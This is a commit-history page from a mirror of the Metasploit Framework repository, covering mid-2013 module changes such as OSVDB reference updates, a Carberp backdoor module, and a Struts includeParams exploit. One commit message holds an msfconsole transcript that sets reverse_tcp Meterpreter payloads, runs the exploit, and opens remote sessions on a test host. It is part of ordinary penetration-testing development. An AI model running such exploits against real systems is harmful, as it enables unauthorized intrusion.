adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
19,034 Commits 27 Branches 1,043 Tags
fca732d893ba16d973f6b1bd59befcdca4e855fe
Commit Graph

519 Commits

Author SHA1 Message Date
jvazquez-r7 8772cfa998 Add support for PLESK on php_cgi_arg_injection 2013-07-04 08:24:25 -05:00
jvazquez-r7 db00599d44 Move carberp_backdoor_exec to unix webapp exploits foler 2013-06-30 10:00:14 -05:00
Brian Wallace d990c7f21f Dat line 2013-06-29 09:46:36 -07:00
Brian Wallace ec7c9b039a Further refactoring requested 2013-06-29 09:45:22 -07:00
Brian Wallace 8542342ff6 Merge branch 'carberp_backdoor_exec' of git@github.com:bwall/metasploit-framework.git into carberp_backdoor_exec 2013-06-28 22:45:03 -07:00
Brian Wallace b8cada9ab0 Applied some refactoring to decrease line count 2013-06-28 22:44:23 -07:00
(B)rian (Wall)ace 9486364cc4 Added Steven K's email 2013-06-28 15:31:17 -07:00
Brian Wallace fe0e16183c Carberp backdoor eval PoC 2013-06-28 14:47:13 -07:00
sinn3r 4df943d1a2 CVE and OSVDB update 2013-06-25 02:06:20 -05:00
jvazquez-r7 f7650a4b18 Fix wrong local variable 2013-06-24 11:35:26 -05:00
William Vu 4cc1f2440d Land #1996, references for several modules 2013-06-20 11:32:55 -05:00
Steve Tornio 322ba27f0f re-order refs 2013-06-20 11:17:23 -05:00
William Vu 22026352e6 Land #1995, OSVDB reference for Gitorious 2013-06-20 10:51:51 -05:00
Steve Tornio 66f4424202 fix formatting 2013-06-20 10:41:14 -05:00
Steve Tornio a3a5dec369 add osvdb ref 94441 2013-06-20 08:03:34 -05:00
Steve Tornio 89f649ab99 add osvdb ref 89026 2013-06-20 07:28:29 -05:00
Steve Tornio 2b55e0e0a6 add osvdb ref 64171 2013-06-20 07:17:22 -05:00
Steve Tornio d19bd7a905 add osvdb 85739, cve 2012-5159, edb 21834 2013-06-20 07:01:59 -05:00
Steve Tornio 6cc7d9ccae add osvdb ref 85446 and edb ref 20500 2013-06-20 06:54:06 -05:00
Steve Tornio ee21120c04 add osvdb ref 85509 2013-06-20 06:47:10 -05:00
Steve Tornio ade970afb8 add osvdb ref 89322 2013-06-20 06:44:22 -05:00
Steve Tornio 42690a5c48 add osvdb ref 77492 2013-06-20 06:38:47 -05:00
Steve Tornio 0dca5ede7e add osvdb ref 78480 2013-06-20 06:07:08 -05:00
Steve Tornio 29bc169507 add osvdb ref 64171 2013-06-20 06:00:05 -05:00
James Lee 81b4efcdb8 Fix requires for PhpEXE 
And incidentally fix some msftidy complaints
 2013-06-19 16:27:59 -05:00
sinn3r b514124997 Land #1979 - OSVDB update 2013-06-18 10:42:09 -05:00
sinn3r fbd16a2f3e Land #1978 - OSVDB update 2013-06-18 10:41:33 -05:00
sinn3r 1e46f7df48 Land #1977 - OSVDB update 2013-06-18 10:40:55 -05:00
Steve Tornio e278ac5061 add osvdb ref 91841 2013-06-18 06:41:30 -05:00
Steve Tornio 404a9f0669 add osvdb ref 89594 2013-06-18 06:25:57 -05:00
Steve Tornio 27158d89c7 add osvdb ref 89105 2013-06-18 06:15:29 -05:00
Steve Tornio 2afc90a8de fix typos 2013-06-18 06:05:45 -05:00
Steve Tornio 2c3181b56b add osvdb ref 90627 2013-06-18 05:59:39 -05:00
William Vu b51349ed77 Land #1968, OSVDB reference for ManageEngine 2013-06-17 10:30:05 -05:00
Steve Tornio e37a0b871f add osvdb ref 86562 2013-06-17 06:04:54 -05:00
Steve Tornio 6e57ecab59 add osvdb ref 79246 and edb ref 18492 2013-06-17 05:58:00 -05:00
Steve Tornio e17ccdda3a add osvdb ref 68662 2013-06-16 18:11:13 -05:00
sinn3r ad87065b9a Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb 2013-06-04 01:35:13 -05:00
Ruslaideemin 71bc06d576 Fix undefined variable in tomcat_mgr_deploy.rb 
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb:100:in `call'
lib/msf/core/thread_manager.rb:100:in `block in spawn'

Uses path instead of path_tmp in error messages.
 2013-06-04 11:19:28 +10:00
Tod Beardsley 4cf682691c New module title and description fixes 2013-06-03 14:40:38 -05:00
jvazquez-r7 146a30ec4d Do minor cleanup for struts_include_params 2013-05-31 01:01:15 -05:00
jvazquez-r7 a7a754ae1f Land #1870, @Console exploit for Struts includeParams injection 2013-05-31 00:59:33 -05:00
Console eb4162d41b boolean issue fix 2013-05-30 18:15:33 +01:00
Console 5fa8ecd334 removed magic number 109 
now calculated from the actual length of all static URL elements
 2013-05-30 17:40:43 +01:00
Console 47524a0570 converted request params to hash merge operation 2013-05-30 15:36:01 +01:00
Console 51879ab9c7 removed unnecessary lines 2013-05-30 15:15:10 +01:00
Console abb0ab12f6 Fix msftidy compliance 2013-05-30 13:10:24 +01:00
Console 5233ac4cbd Progress bar instead of message spam. 2013-05-30 13:08:43 +01:00
Console fb388c6463 Chunk length is now "huge" for POST method 
minor changes to option text and changed HTTPMETHOD to an enum.
 2013-05-30 11:30:24 +01:00
Console ab6a2a049b Fix issue with JAVA meterpreter failing to work. 
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
 2013-05-30 10:35:29 +01:00